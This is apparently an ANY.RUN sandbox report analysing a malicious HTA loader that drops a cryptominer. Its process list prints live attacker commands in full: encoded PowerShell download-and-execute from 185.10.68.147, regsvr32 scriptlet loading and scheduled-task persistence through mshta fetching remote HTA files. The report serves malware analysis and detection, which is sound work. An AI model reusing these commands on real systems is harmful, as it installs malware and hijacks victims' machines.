download:

checking.hta

Full analysis: https://app.any.run/tasks/1838b417-4df5-4047-a8c8-d264dbb8c3a8
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: August 03, 2020, 06:32:57
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
loader
Indicators:
MIME: text/html
File info: HTML document, ASCII text
MD5:

73AEF3D5CBC0E4DA2FCD422D992BE178

SHA1:

0FF349676ABAC0BBFC8C485968C6D366162626D8

SHA256:

604C2C2D46C1456D691D2F8AB3330C27C39E6872E99D3C64BA1A3475659DE05C

SSDEEP:

12:r6Qclfhtxvsdj+cTPYsUMI4di9nJInppcgFcWZPvskc4ISOP:rspXOj+cTQsu+ilW1Fco8ktA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3840)
      • schtasks.exe (PID: 3916)
      • schtasks.exe (PID: 2392)
      • schtasks.exe (PID: 3780)
      • schtasks.exe (PID: 2388)
      • schtasks.exe (PID: 684)
      • schtasks.exe (PID: 2128)
      • schtasks.exe (PID: 3328)
      • schtasks.exe (PID: 3608)
      • schtasks.exe (PID: 2760)
      • schtasks.exe (PID: 3712)
      • schtasks.exe (PID: 2972)
      • schtasks.exe (PID: 2344)
      • schtasks.exe (PID: 2988)
      • schtasks.exe (PID: 1884)
      • schtasks.exe (PID: 3996)
    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 2116)
      • cmd.exe (PID: 3668)
      • cmd.exe (PID: 3036)
      • cmd.exe (PID: 3216)
      • cmd.exe (PID: 2292)
      • cmd.exe (PID: 3668)
      • cmd.exe (PID: 1128)
      • cmd.exe (PID: 656)
      • cmd.exe (PID: 2060)
      • cmd.exe (PID: 2824)
      • cmd.exe (PID: 3472)
      • cmd.exe (PID: 2908)
      • cmd.exe (PID: 1692)
      • cmd.exe (PID: 3836)
      • cmd.exe (PID: 2836)
      • cmd.exe (PID: 3048)
    • Executes PowerShell scripts

      • cmd.EXE (PID: 2904)
      • cmd.exe (PID: 1732)
      • cmd.exe (PID: 4036)
    • Application was dropped or rewritten from another process

      • java.exe (PID: 3720)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 1676)
    • Downloads executable files from IP

      • powershell.exe (PID: 1676)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 1808)
      • powershell.exe (PID: 1676)
      • powershell.exe (PID: 1688)
      • powershell.exe (PID: 2476)
    • Executed via Task Scheduler

      • cmd.exe (PID: 1540)
      • cmd.EXE (PID: 2904)
    • Reads Internet Cache Settings

      • regsvr32.exe (PID: 3488)
    • Executes PowerShell scripts

      • regsvr32.exe (PID: 3488)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1676)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 1676)
      • mshta.exe (PID: 552)
      • powershell.exe (PID: 1808)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 552)
    • Reads settings of System Certificates

      • powershell.exe (PID: 1808)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.html | HyperText Markup Language (100)
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
82
Monitored processes
43
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start mshta.exe no specs cmd.exe no specs powershell.exe cmd.exe no specs schtasks.exe no specs cmd.exe no specs schtasks.exe no specs cmd.exe no specs schtasks.exe no specs cmd.exe no specs schtasks.exe no specs cmd.exe no specs schtasks.exe no specs cmd.exe no specs schtasks.exe no specs cmd.exe no specs schtasks.exe no specs cmd.exe no specs schtasks.exe no specs cmd.exe no specs schtasks.exe no specs cmd.exe no specs cmd.exe no specs schtasks.exe no specs cmd.exe no specs schtasks.exe no specs cmd.exe no specs schtasks.exe no specs cmd.exe no specs schtasks.exe no specs cmd.exe no specs cmd.exe no specs schtasks.exe no specs powershell.exe no specs cmd.exe no specs schtasks.exe no specs cmd.exe no specs schtasks.exe no specs regsvr32.exe powershell.exe cmd.exe no specs powershell.exe no specs java.exe

Process information

PID
CMD
Path
Indicators
Parent process
552"C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Temp\checking.hta"C:\Windows\System32\mshta.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
4294967295
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\mshta.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
656"C:\Windows\System32\cmd.exe" /c SCHTASKS /create /tn "Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1337" /sc HOURLY /f /mo 22 /tr "cmd /c powershell -nop -noni -w 1 -enc cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAMAAuADYAOAAuADEANAA3AC8AdwBpAG4ALwBwAGgAcAAvAGYAdQBuAGMALgBwAGgAcAAgAHMAYwByAG8AYgBqAC4AZABsAGwA"C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
684SCHTASKS /create /tn "Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1137" /sc HOURLY /f /mo 20 /tr "C:\Windows\System32\cmd.exe /c mshta http://asq.r77vh0.pw/win/checking.hta"C:\Windows\system32\schtasks.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
1128"C:\Windows\System32\cmd.exe" /c SCHTASKS /create /tn "Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1138" /sc HOURLY /f /mo 23 /tr "C:\Windows\System32\cmd.exe /c mshta https://asq.d6shiiwz.pw/win/hssl/d6.hta"C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1540C:\Windows\System32\cmd.exe /c C:\Users\admin\AppData\Roaming\Microsoft\Network\PrivFalse.batC:\Windows\System32\cmd.exetaskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1676"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -w hidden -enc aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMQAwAC4ANgA4AC4AMQA0ADcALwB3AGkAbgAvADMAcAAvAHcAYQB0AGMAaABlAHIAXwBuAHAALgBwAHMAMQAnACkAKQA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
regsvr32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1688powershell -w 1 -e cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAMAAuADYAOAAuADEANAA3AC8AdwBpAG4ALwBwAGgAcAAvAHcAYQB0AGMAaABlAHIALgBwAGgAcAAgAHMAYwByAG8AYgBqAC4AZABsAGwAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1692"C:\Windows\System32\cmd.exe" /c SCHTASKS /create /tn "Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1447" /sc HOURLY /f /mo 22 /tr "cmd /c powershell -nop -noni -w 1 -enc cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcAA6AC8ALwBhAHMAcQAuAHIANwA3AHYAaAAwAC4AcAB3AC8AdwBpAG4ALwBwAGgAcAAvAGYAdQBuAGMALgBwAGgAcAAgAHMAYwByAG8AYgBqAC4AZABsAGwA"C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1732"C:\Windows\system32\cmd.exe" /c powershell -c "start-process -FilePath "C:\Users\admin\AppData\Roaming\Java\java.exe" -WindowStyle Hidden"C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1808powershell.exe -w 1 -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('http://185.10.68.147/win/checking.ps1'))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
1 589
Read events
1 329
Write events
260
Delete events
0

Modification events

(PID) Process:(1808) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\132\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(552) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(552) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(1808) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(1808) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(1808) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(1808) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
4294901760
(PID) Process:(1808) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(1808) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(1808) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
Executable files
1
Suspicious files
8
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
1808powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\29MU9J2FV9II39PQ35R6.temp
MD5:
SHA256:
1688powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O67DON4YELVJJ7H9WE8G.temp
MD5:
SHA256:
1676powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XTJHH8SXB74R3OJYIK4T.temp
MD5:
SHA256:
2476powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2WKJM3SGAZUZ0T41SRHA.temp
MD5:
SHA256:
2476powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:
SHA256:
1808powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFd689e.TMPbinary
MD5:
SHA256:
1688powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:
SHA256:
1676powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFded2f.TMPbinary
MD5:
SHA256:
1676powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:
SHA256:
2476powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFe0ccd.TMPbinary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
6
DNS requests
1
Threats
22

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3488
regsvr32.exe
GET
200
185.10.68.147:80
http://185.10.68.147/win/php/watcher.php
SC
xml
606 b
malicious
1676
powershell.exe
GET
200
185.10.68.147:80
http://185.10.68.147/win/min/32.exe
SC
executable
6.40 Mb
malicious
1676
powershell.exe
GET
200
185.10.68.147:80
http://185.10.68.147/win/3p/watcher_np.ps1
SC
text
2.37 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1808
powershell.exe
185.10.68.147:80
Flokinet Ltd
SC
malicious
1808
powershell.exe
185.10.68.147:443
Flokinet Ltd
SC
malicious
3488
regsvr32.exe
185.10.68.147:80
Flokinet Ltd
SC
malicious
1676
powershell.exe
185.10.68.147:80
Flokinet Ltd
SC
malicious
3720
java.exe
185.10.68.220:443
eu.minerpool.pw
Flokinet Ltd
SC
suspicious

DNS requests

Domain
IP
Reputation
eu.minerpool.pw
  • 185.10.68.220
suspicious

Threats

PID
Process
Class
Message
1808
powershell.exe
Potentially Bad Traffic
ET INFO Dotted Quad Host PS1 Request
1808
powershell.exe
Misc activity
SUSPICIOUS [PTsecurity] PowerShell.Script Request
1808
powershell.exe
A Network Trojan was detected
ET INFO PowerShell NoProfile Command Received In Powershell Stagers
1808
powershell.exe
A Network Trojan was detected
ET INFO PowerShell Hidden Window Command Common In Powershell Stagers M2
1808
powershell.exe
A Network Trojan was detected
ET INFO PowerShell NonInteractive Command Common In Powershell Stagers
1808
powershell.exe
A Network Trojan was detected
ET INFO PowerShell Base64 Encoded Content Command Common In Powershell Stagers M1
1808
powershell.exe
A Network Trojan was detected
ET INFO PowerShell Base64 Encoded Content Command Common In Powershell Stagers M2
1808
powershell.exe
A Network Trojan was detected
ET INFO PowerShell DownloadFile Command Common In Powershell Stagers
1808
powershell.exe
A Network Trojan was detected
ET INFO PowerShell DownloadString Command Common In Powershell Stagers
3488
regsvr32.exe
A Network Trojan was detected
MALWARE [PTsecurity] VBS.Loader.Gen
2 ETPRO signatures available at the full report
No debug info